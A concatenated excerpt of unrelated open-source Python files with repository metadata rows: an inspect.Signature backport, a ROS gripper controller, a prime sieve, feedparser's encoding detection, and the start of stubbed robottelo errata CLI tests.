if formatted is None:
formatted = ''
formatted = '<{}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{}:{}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{}={}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{} at {:#x} {!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments:
'''Result of `Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
* arguments : OrderedDict
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
* signature : Signature
The Signature object that created this instance.
* args : tuple
Tuple of positional arguments values.
* kwargs : dict
Dict of keyword arguments values.
'''
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature:
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes and methods:
* parameters : OrderedDict
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
* return_annotation : object
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
* bind(*args, **kwargs) -> BoundArguments
Creates a mapping from positional and keyword arguments to
parameters.
* bind_partial(*args, **kwargs) -> BoundArguments
Creates a partial mapping from positional and keyword arguments
to parameters (simulating 'functools.partial' behavior.)
'''
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, *, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {} before {}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = types.MappingProxyType(params)
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = func_code.co_kwonlyargcount
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = func.__annotations__
defaults = func.__defaults__
kwdefaults = func.__kwdefaults__
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
return self._parameters
@property
def return_annotation(self):
return self._return_annotation
def replace(self, *, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = {param: idx
for idx, param in enumerate(other.parameters.keys())}
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, *, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg) from None
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments') from None
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name)) from None
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(__bind_self, *args, **kwargs):
'''Get a BoundArguments object, that maps the passed `args`
and `kwargs` to the function's signature. Raises `TypeError`
if the passed arguments can not be bound.
'''
return __bind_self._bind(args, kwargs)
def bind_partial(__bind_self, *args, **kwargs):
'''Get a BoundArguments object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises `TypeError` if the passed arguments can not be bound.
'''
return __bind_self._bind(args, kwargs, partial=True)
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {}'.format(anno)
return rendered
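# --- Illustrative usage sketch (not part of the original module). The helper
# function below is hypothetical and only exercises the classes defined above.
if __name__ == '__main__':
    def _greet(name, greeting='hello', *rest, **extra):
        return '{} {}'.format(greeting, name)
    _sig = Signature.from_function(_greet)
    print(_sig)                        # (name, greeting='hello', *rest, **extra)
    _bound = _sig.bind('world', greeting='hi')
    print(_bound.args, _bound.kwargs)  # ('world', 'hi') {}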
| gpl-2.0 | -3,654,882,928,471,189,500 | 37.033751 | 84 | 0.588411 | false | 4.555703 | false | false | false |
gtagency/roscorobot | Corobot/corobot_arm/nodes/parallel_gripper_controller.py | 1 | 3967 | #!/usr/bin/env python
"""
parallel_gripper_controller.py - controls a gripper built of two servos
Copyright (c) 2011 Vanadium Labs LLC. All right reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Vanadium Labs LLC nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL VANADIUM LABS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import roslib; roslib.load_manifest('arbotix_controllers')
import rospy
import thread
from std_msgs.msg import Float64
from math import asin
class ParallelGripperController:
""" A simple controller that operates two opposing servos to
open/close to a particular size opening. """
def __init__(self):
rospy.init_node("parallel_gripper_controller")
# trapezoid model: base width connecting each gripper's rotation point
# + length of gripper fingers to computation point
# = compute angles based on a desired width at comp. point
self.pad_width = rospy.get_param("~pad_width", 0.01)
self.finger_length = rospy.get_param("~finger_length", 0.02)
self.min_opening = rospy.get_param("~min", 0.0)
self.max_opening = rospy.get_param("~max", 2*self.finger_length)
self.center_l = rospy.get_param("~center_left", 0.0)
self.center_r = rospy.get_param("~center_right", 0.0)
self.invert_l = rospy.get_param("~invert_left", False)
self.invert_r = rospy.get_param("~invert_right", False)
# publishers
self.l_pub = rospy.Publisher("l_gripper_joint/command", Float64)
self.r_pub = rospy.Publisher("r_gripper_joint/command", Float64)
# subscribe to command and then spin
rospy.Subscriber("~command", Float64, self.commandCb)
rospy.spin()
def commandCb(self, msg):
""" Take an input command of width to open gripper. """
# check limits
if msg.data > self.max_opening or msg.data < self.min_opening:
rospy.logerr("Command exceeds limits.")
return
# compute angles
angle = asin((msg.data - self.pad_width)/(2*self.finger_length))
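        # Worked example (illustrative, using the default parameters above):
        # pad_width=0.01 and finger_length=0.02 with a commanded width of 0.03
        # give angle = asin(0.02 / 0.04) = asin(0.5) ~= 0.524 rad (30 degrees).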
if self.invert_l:
l = -angle + self.center_l
else:
l = angle + self.center_l
if self.invert_r:
r = angle + self.center_r
else:
r = -angle + self.center_r
# publish msgs
lmsg = Float64(l)
rmsg = Float64(r)
self.l_pub.publish(lmsg)
self.r_pub.publish(rmsg)
if __name__=="__main__":
try:
ParallelGripperController()
except rospy.ROSInterruptException:
rospy.loginfo("Hasta la Vista...")
| gpl-2.0 | 5,491,262,526,570,646,000 | 42.593407 | 83 | 0.670028 | false | 4.106625 | false | false | false |
JaDogg/__py_playground | reference/sketchbook/misc/primesieve.py | 1 | 1135 | # Let's try rendering the outline from
# http://en.literateprograms.org/Sieve_of_Eratosthenes_(Haskell)#Putting_it_together
# But I had to peek at their code for merge_all().
# (Could we make diff/merge shorter using Kragen's post on merging?)
# (Or how about defining diff in terms of merge and complement?)
def diff(xs, ys):
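    "Yield items of the ascending stream xs that are not in the ascending stream ys."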
x, y = next(xs), next(ys)
while True:
if x < y: yield x
if x <= y: x = next(xs)
else: y = next(ys)
def merge(xs, ys):
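    "Merge two ascending streams into one ascending stream; values present in both are yielded once."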
x, y = next(xs), next(ys)
while True:
d = x - y
yield x if d <= 0 else y
if d <= 0: x = next(xs)
if 0 <= d: y = next(ys)
from itertools import count
from streams import LazyList
def gen_primes():
yield 2; yield 3; yield 5
multiples = merge_all(count(p*p, 2*p) for p in primes.tail())
for p in diff(count(7, 2), multiples): yield p
def merge_all(iters):
"Merge a stream of sorted streams, given map(next, iters) would be strictly increasing."
xs = next(iters)
yield next(xs)
for x in merge(xs, merge_all(iters)): yield x
primes = LazyList(gen_primes())
for p in primes: print(p)
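# Running this module prints the primes in ascending order: 2, 3, 5, 7, 11, 13, ...
# (it does not terminate on its own, since gen_primes() yields an infinite stream).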
| mit | 2,611,252,358,811,437,000 | 28.868421 | 92 | 0.623789 | false | 3.059299 | false | false | false |
eleonrk/SickRage | lib/feedparser/encodings.py | 19 | 12215 | # Character encoding routines
# Copyright 2010-2015 Kurt McKee <[email protected]>
# Copyright 2002-2008 Mark Pilgrim
# All rights reserved.
#
# This file is a part of feedparser.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import, unicode_literals
import cgi
import codecs
import collections
import re
try:
import chardet
except ImportError:
chardet = None
lazy_chardet_encoding = None
else:
def lazy_chardet_encoding(data):
chardet_encoding = chardet.detect(data)['encoding']
if not chardet_encoding:
chardet_encoding = ''
if isinstance(chardet_encoding, bytes_):
chardet_encoding = chardet_encoding.encode('ascii', 'ignore')
return chardet_encoding
from .exceptions import (
CharacterEncodingOverride, CharacterEncodingUnknown, NonXMLContentType,
)
bytes_ = type(b'')
unicode_ = type('')
# Each marker represents some of the characters of the opening XML
# processing instruction ('<?xm') in the specified encoding.
EBCDIC_MARKER = b'\x4C\x6F\xA7\x94'
UTF16BE_MARKER = b'\x00\x3C\x00\x3F'
UTF16LE_MARKER = b'\x3C\x00\x3F\x00'
UTF32BE_MARKER = b'\x00\x00\x00\x3C'
UTF32LE_MARKER = b'\x3C\x00\x00\x00'
ZERO_BYTES = '\x00\x00'
# Match the opening XML declaration.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_DECLARATION = re.compile(r'^<\?xml[^>]*?>')
# Capture the value of the XML processing instruction's encoding attribute.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_PI_ENCODING = re.compile(b'^<\?.*encoding=[\'"](.*?)[\'"].*\?>')
def convert_to_utf8(http_headers, data, result):
'''Detect and convert the character encoding to UTF-8.
http_headers is a dictionary
data is a raw string (not Unicode)'''
# This is so much trickier than it sounds, it's not even funny.
# According to RFC 3023 ('XML Media Types'), if the HTTP Content-Type
# is application/xml, application/*+xml,
# application/xml-external-parsed-entity, or application/xml-dtd,
# the encoding given in the charset parameter of the HTTP Content-Type
# takes precedence over the encoding given in the XML prefix within the
# document, and defaults to 'utf-8' if neither are specified. But, if
# the HTTP Content-Type is text/xml, text/*+xml, or
# text/xml-external-parsed-entity, the encoding given in the XML prefix
# within the document is ALWAYS IGNORED and only the encoding given in
# the charset parameter of the HTTP Content-Type header should be
# respected, and it defaults to 'us-ascii' if not specified.
# Furthermore, discussion on the atom-syntax mailing list with the
# author of RFC 3023 leads me to the conclusion that any document
# served with a Content-Type of text/* and no charset parameter
# must be treated as us-ascii. (We now do this.) And also that it
# must always be flagged as non-well-formed. (We now do this too.)
# If Content-Type is unspecified (input was local file or non-HTTP source)
# or unrecognized (server just got it totally wrong), then go by the
# encoding given in the XML prefix of the document and default to
# 'iso-8859-1' as per the HTTP specification (RFC 2616).
# Then, assuming we didn't find a character encoding in the HTTP headers
# (and the HTTP Content-type allowed us to look in the body), we need
# to sniff the first few bytes of the XML data and try to determine
# whether the encoding is ASCII-compatible. Section F of the XML
# specification shows the way here:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# If the sniffed encoding is not ASCII-compatible, we need to make it
# ASCII compatible so that we can sniff further into the XML declaration
# to find the encoding attribute, which will tell us the true encoding.
# Of course, none of this guarantees that we will be able to parse the
# feed in the declared character encoding (assuming it was declared
# correctly, which many are not). iconv_codec can help a lot;
# you should definitely install it if you can.
# http://cjkpython.i18n.org/
bom_encoding = ''
xml_encoding = ''
rfc3023_encoding = ''
# Look at the first few bytes of the document to guess what
# its encoding may be. We only need to decode enough of the
# document that we can use an ASCII-compatible regular
# expression to search for an XML encoding declaration.
# The heuristic follows the XML specification, section F:
# http://www.w3.org/TR/REC-xml/#sec-guessing-no-ext-info
# Check for BOMs first.
if data[:4] == codecs.BOM_UTF32_BE:
bom_encoding = 'utf-32be'
data = data[4:]
elif data[:4] == codecs.BOM_UTF32_LE:
bom_encoding = 'utf-32le'
data = data[4:]
elif data[:2] == codecs.BOM_UTF16_BE and data[2:4] != ZERO_BYTES:
bom_encoding = 'utf-16be'
data = data[2:]
elif data[:2] == codecs.BOM_UTF16_LE and data[2:4] != ZERO_BYTES:
bom_encoding = 'utf-16le'
data = data[2:]
elif data[:3] == codecs.BOM_UTF8:
bom_encoding = 'utf-8'
data = data[3:]
# Check for the characters '<?xm' in several encodings.
elif data[:4] == EBCDIC_MARKER:
bom_encoding = 'cp037'
elif data[:4] == UTF16BE_MARKER:
bom_encoding = 'utf-16be'
elif data[:4] == UTF16LE_MARKER:
bom_encoding = 'utf-16le'
elif data[:4] == UTF32BE_MARKER:
bom_encoding = 'utf-32be'
elif data[:4] == UTF32LE_MARKER:
bom_encoding = 'utf-32le'
tempdata = data
try:
if bom_encoding:
tempdata = data.decode(bom_encoding).encode('utf-8')
except (UnicodeDecodeError, LookupError):
# feedparser recognizes UTF-32 encodings that aren't
# available in Python 2.4 and 2.5, so it's possible to
# encounter a LookupError during decoding.
xml_encoding_match = None
else:
xml_encoding_match = RE_XML_PI_ENCODING.match(tempdata)
if xml_encoding_match:
xml_encoding = xml_encoding_match.groups()[0].decode('utf-8').lower()
# Normalize the xml_encoding if necessary.
if bom_encoding and (xml_encoding in (
'u16', 'utf-16', 'utf16', 'utf_16',
'u32', 'utf-32', 'utf32', 'utf_32',
'iso-10646-ucs-2', 'iso-10646-ucs-4',
'csucs4', 'csunicode', 'ucs-2', 'ucs-4'
)):
xml_encoding = bom_encoding
# Find the HTTP Content-Type and, hopefully, a character
# encoding provided by the server. The Content-Type is used
# to choose the "correct" encoding among the BOM encoding,
# XML declaration encoding, and HTTP encoding, following the
# heuristic defined in RFC 3023.
http_content_type = http_headers.get('content-type') or ''
http_content_type, params = cgi.parse_header(http_content_type)
http_encoding = params.get('charset', '').replace("'", "")
if isinstance(http_encoding, bytes_):
http_encoding = http_encoding.decode('utf-8', 'ignore')
acceptable_content_type = 0
application_content_types = ('application/xml', 'application/xml-dtd',
'application/xml-external-parsed-entity')
text_content_types = ('text/xml', 'text/xml-external-parsed-entity')
if (http_content_type in application_content_types) or \
(http_content_type.startswith('application/') and
http_content_type.endswith('+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or xml_encoding or 'utf-8'
elif (http_content_type in text_content_types) or \
(http_content_type.startswith('text/') and
http_content_type.endswith('+xml')):
acceptable_content_type = 1
rfc3023_encoding = http_encoding or 'us-ascii'
elif http_content_type.startswith('text/'):
rfc3023_encoding = http_encoding or 'us-ascii'
elif http_headers and 'content-type' not in http_headers:
rfc3023_encoding = xml_encoding or 'iso-8859-1'
else:
rfc3023_encoding = xml_encoding or 'utf-8'
# gb18030 is a superset of gb2312, so always replace gb2312
# with gb18030 for greater compatibility.
if rfc3023_encoding.lower() == 'gb2312':
rfc3023_encoding = 'gb18030'
if xml_encoding.lower() == 'gb2312':
xml_encoding = 'gb18030'
# there are four encodings to keep track of:
# - http_encoding is the encoding declared in the Content-Type HTTP header
# - xml_encoding is the encoding declared in the <?xml declaration
# - bom_encoding is the encoding sniffed from the first 4 bytes of the XML data
# - rfc3023_encoding is the actual encoding, as per RFC 3023 and a variety of other conflicting specifications
error = None
if http_headers and (not acceptable_content_type):
if 'content-type' in http_headers:
msg = '%s is not an XML media type' % http_headers['content-type']
else:
msg = 'no Content-type specified'
error = NonXMLContentType(msg)
# determine character encoding
known_encoding = 0
tried_encodings = []
# try: HTTP encoding, declared XML encoding, encoding sniffed from BOM
for proposed_encoding in (rfc3023_encoding, xml_encoding, bom_encoding,
lazy_chardet_encoding, 'utf-8', 'windows-1252', 'iso-8859-2'):
if isinstance(proposed_encoding, collections.Callable):
proposed_encoding = proposed_encoding(data)
if not proposed_encoding:
continue
if proposed_encoding in tried_encodings:
continue
tried_encodings.append(proposed_encoding)
try:
data = data.decode(proposed_encoding)
except (UnicodeDecodeError, LookupError):
pass
else:
known_encoding = 1
# Update the encoding in the opening XML processing instruction.
new_declaration = '''<?xml version='1.0' encoding='utf-8'?>'''
if RE_XML_DECLARATION.search(data):
data = RE_XML_DECLARATION.sub(new_declaration, data)
else:
data = new_declaration + '\n' + data
data = data.encode('utf-8')
break
# if still no luck, give up
if not known_encoding:
error = CharacterEncodingUnknown(
'document encoding unknown, I tried ' +
'%s, %s, utf-8, windows-1252, and iso-8859-2 but nothing worked' %
(rfc3023_encoding, xml_encoding))
rfc3023_encoding = ''
elif proposed_encoding != rfc3023_encoding:
error = CharacterEncodingOverride(
'document declared as %s, but parsed as %s' %
(rfc3023_encoding, proposed_encoding))
rfc3023_encoding = proposed_encoding
result['encoding'] = rfc3023_encoding
if error:
result['bozo'] = True
result['bozo_exception'] = error
return data
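# Illustrative usage sketch (not part of the original module); the header value
# and XML bytes below are made-up examples:
#     result = {}
#     data = convert_to_utf8(
#         {'content-type': 'application/xml; charset=iso-8859-1'},
#         b"<?xml version='1.0' encoding='iso-8859-1'?><feed/>",
#         result)
#     # now result['encoding'] == 'iso-8859-1' and the returned bytes are UTF-8,
#     # with the XML declaration rewritten to declare utf-8.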
| gpl-3.0 | -1,332,576,937,644,737,500 | 42.781362 | 114 | 0.665411 | false | 3.839987 | false | false | false |
abalakh/robottelo | tests/foreman/cli/test_errata.py | 1 | 15389 | # pylint: disable=too-many-public-methods
"""CLI Tests for the errata management feature"""
# For ease of use hc refers to host-collection throughout this document
from robottelo.decorators import stubbed
from robottelo.test import CLITestCase
class ErrataTestCase(CLITestCase):
"""CLI Tests for the errata management feature"""
@stubbed()
def test_hc_errata_install_1(self):
"""@Test: Using hc-id and org id to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization-id <orgid>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_2(self):
"""@Test: Using hc-id and org name to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization <org name>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_3(self):
"""@Test: Use hc-id and org label to install an erratum in a hc
@Feature: Errata
@Setup: errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
--organization-label <org label>
@Assert: Errata is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_4(self):
"""@Test: Use hc-name and org id to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization-id <orgid>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_5(self):
"""@Test: Use hc name and org name to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization <org name>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_6(self):
"""@Test: Use hc-name and org label to install an erratum in a hc
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
--organization-label <org label>
@Assert: Erratum is installed.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_7(self):
"""@Test: Attempt to install an erratum in a hc using hc-id and not
specifying the erratum info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --id <id> --organization-id <orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_8(self):
"""@Test: Attempt to install an erratum in a hc using hc-name and not
specifying the erratum info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --name <name> --organization-id
<orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_9(self):
"""@Test: Attempt to install an erratum in a hc by not specifying hc
info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --organization-id
<orgid>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_10(self):
"""@Test: Attempt to install an erratum in a hc using hc-id and not
specifying org info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --id <id>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_hc_errata_install_11(self):
"""@Test: Attempt to install an erratum in a hc without specifying hc
info
@Feature: Errata
@Setup: Errata synced on satellite server.
@Steps:
1. host-collection erratum install --errata <errata> --name <name>
@Assert: Error message thrown.
@Status: Manual
"""
@stubbed()
def test_errata_list_sort_1(self):
"""@Test: Sort errata by Issued date
@Feature: Errata
@Setup: Errata synced on satellite server.
